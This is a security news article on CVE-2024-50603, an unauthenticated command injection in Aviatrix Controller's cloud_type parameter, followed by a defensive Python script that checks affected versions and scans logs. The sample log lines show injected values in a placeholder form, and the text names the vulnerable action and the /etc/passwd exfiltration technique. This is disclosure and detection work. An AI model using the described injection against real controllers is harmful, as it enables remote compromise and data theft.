Jakub Korepta, Principal Security Consultant and Head of Infrastructure Security at Securing, has released a detailed report uncovering a critical command injection vulnerability in Aviatrix Network Controller. The flaw, identified as CVE-2024-50603, has been assigned the maximum CVSS score of 10.0.
The vulnerability exists in Aviatrix Controller versions 7.x through 7.2.4820, where improper neutralization of special elements in system commands enables unauthenticated attackers to execute arbitrary code remotely. Korepta explains, “Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to remotely execute arbitrary code.”
This critical flaw affects enterprises relying on Aviatrix for cloud networking solutions that unify clouds, simplify operations, and provide advanced security.
The root cause of the vulnerability lies in how user inputs are processed within the Aviatrix Controller’s API. Korepta highlights that while some parameters are properly sanitized using functions like escapeshellarg, others, such as the cloud_type parameter in the list_flightpath_destination_instances action, are not.
In his analysis, Korepta demonstrated how the vulnerability could be exploited through a single crafted HTTP request (reproduced in the original report).
The request appends a malicious command to the vulnerable parameter, allowing the attacker to execute arbitrary code. In the proof of concept, Korepta successfully extracted the contents of /etc/passwd by redirecting it to a server under his control.
The CVE-2024-50603 vulnerability poses significant risks, including:
- Remote Code Execution: Allows attackers to execute commands with system-level privileges.
- Data Exfiltration: Sensitive system files and data can be extracted.
- System Compromise: Full control over the Aviatrix Controller could enable lateral movement and further exploitation.
Korepta’s research identified 681 publicly exposed Aviatrix Controllers via Shodan, amplifying the urgency for patching.
Aviatrix has addressed the vulnerability in Aviatrix Controller version 7.2.4996. Users are strongly advised to update to the latest version to mitigate this critical risk.
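The two checks a defender wants from this write-up are a version test against the affected range and a log rule for requests that hit the unsanitised action with shell metacharacters in cloud_type. The Python below is an added example, not code from Securing or Aviatrix; the API path, log format and sample lines are constructed, and builds between 7.2.4820 and 7.2.4996 are treated as unpatched, which is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Versions taken from the write-up: 7.x through 7.2.4820 is affected and
# 7.2.4996 carries the fix. Assumption: any 7.x build below 7.2.4996 is unpatched.
FIRST_FIXED = (7, 2, 4996)

def parse_version(v: str) -> tuple:
    return tuple(int(p) for p in v.strip().split("."))

def is_affected(version: str) -> bool:
    """True when a controller's reported version is a 7.x build below the fix."""
    parts = parse_version(version)
    return parts[0] == 7 and parts < FIRST_FIXED

# Metacharacters that change the meaning of an OS command line.
SHELL_META = re.compile(r"[;&|`$<>\n]")
VULN_ACTION = "list_flightpath_destination_instances"

def suspicious_request(url: str) -> bool:
    """Flag a request to the vulnerable action whose cloud_type carries shell metacharacters."""
    qs = parse_qs(urlsplit(url).query)  # parse_qs also decodes %3B -> ';'
    if VULN_ACTION not in qs.get("action", []):
        return False
    return any(SHELL_META.search(v) for v in qs.get("cloud_type", []))

# Constructed access-log lines; /v1/api is a hypothetical endpoint, not the real one.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2025:10:00:01 +0000] "GET /v1/api?action=list_flightpath_destination_instances&cloud_type=1 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2025:10:00:07 +0000] "GET /v1/api?action=list_flightpath_destination_instances&cloud_type=1%3B%20PAYLOAD HTTP/1.1" 200 80
10.0.0.5 - - [10/Jan/2025:10:00:09 +0000] "GET /v1/api?action=list_vpcs&cloud_type=1%3B%20PAYLOAD HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(text: str) -> list:
    """Return the source IPs of lines that look like CVE-2024-50603 injection attempts."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m and suspicious_request(m.group(1)):
            hits.append(line.split()[0])
    return hits
```

Because the controller builds the command from the query value, any request matching the second line is worth an alert regardless of whether the command succeeded.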
For the full technical analysis, refer to Korepta’s original report.